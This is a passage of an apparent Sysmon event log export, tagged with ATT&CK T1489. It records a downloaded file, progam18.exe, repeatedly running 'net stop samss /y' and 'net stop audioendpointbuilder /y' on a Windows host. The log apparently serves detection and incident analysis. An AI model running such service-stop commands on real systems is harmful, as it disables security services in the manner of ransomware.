Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00}\r\nParentProcessId: 269684\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:54.798"",""processGuid"":""{df9fc3d3-d22e-5ec7-0000-0010346a3f00}"",""processId"":""272192"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d22a-5ec7-0000-0010e43f3f00}"",""parentProcessId"":""269684"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:18.967",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:53.005 +ProcessGuid: {df9fc3d3-d22d-5ec7-0000-00107f5a3f00} +ProcessId: 270600 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00} +ParentProcessId: 269020 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:53.150352700Z"",""eventRecordID"":""1230"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:53.005\r\nProcessGuid: {df9fc3d3-d22d-5ec7-0000-00107f5a3f00}\r\nProcessId: 270600\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00}\r\nParentProcessId: 269020\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:53.005"",""processGuid"":""{df9fc3d3-d22d-5ec7-0000-00107f5a3f00}"",""processId"":""270600"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d22a-5ec7-0000-001090363f00}"",""parentProcessId"":""269020"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:18.686",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:50.728 +ProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00} +ProcessId: 269684 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:50.769521000Z"",""eventRecordID"":""1229"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:50.728\r\nProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00}\r\nProcessId: 269684\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:50.728"",""processGuid"":""{df9fc3d3-d22a-5ec7-0000-0010e43f3f00}"",""processId"":""269684"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:18.682",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:50.085 +ProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00} +ProcessId: 269020 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:50.126734400Z"",""eventRecordID"":""1228"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:50.085\r\nProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00}\r\nProcessId: 269020\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:50.085"",""processGuid"":""{df9fc3d3-d22a-5ec7-0000-001090363f00}"",""processId"":""269020"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:02.986",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:20.475 +ProcessGuid: {df9fc3d3-d20c-5ec7-0000-0010c0c23c00} +ProcessId: 230284 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00} +ParentProcessId: 226656 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:20.528225300Z"",""eventRecordID"":""1194"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:20.475\r\nProcessGuid: {df9fc3d3-d20c-5ec7-0000-0010c0c23c00}\r\nProcessId: 230284\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00}\r\nParentProcessId: 226656\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:20.475"",""processGuid"":""{df9fc3d3-d20c-5ec7-0000-0010c0c23c00}"",""processId"":""230284"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d209-5ec7-0000-0010a4903c00}"",""parentProcessId"":""226656"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:40:57.870",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:18.705 +ProcessGuid: {df9fc3d3-d20a-5ec7-0000-0010cda03c00} +ProcessId: 227980 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00} +ParentProcessId: 225820 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:18.743263600Z"",""eventRecordID"":""1192"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:18.705\r\nProcessGuid: {df9fc3d3-d20a-5ec7-0000-0010cda03c00}\r\nProcessId: 227980\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00}\r\nParentProcessId: 225820\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:18.705"",""processGuid"":""{df9fc3d3-d20a-5ec7-0000-0010cda03c00}"",""processId"":""227980"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d209-5ec7-0000-0010e9843c00}"",""parentProcessId"":""225820"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:40:54.181",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:17.652 +ProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00} +ProcessId: 226656 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:17.672830100Z"",""eventRecordID"":""1191"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:17.652\r\nProcessGuid: {df9fc3d3-d209-5ec7-0000-0010a4903c00}\r\nProcessId: 226656\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:17.652"",""processGuid"":""{df9fc3d3-d209-5ec7-0000-0010a4903c00}"",""processId"":""226656"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:40:54.069",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:17.120 +ProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00} +ProcessId: 225820 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 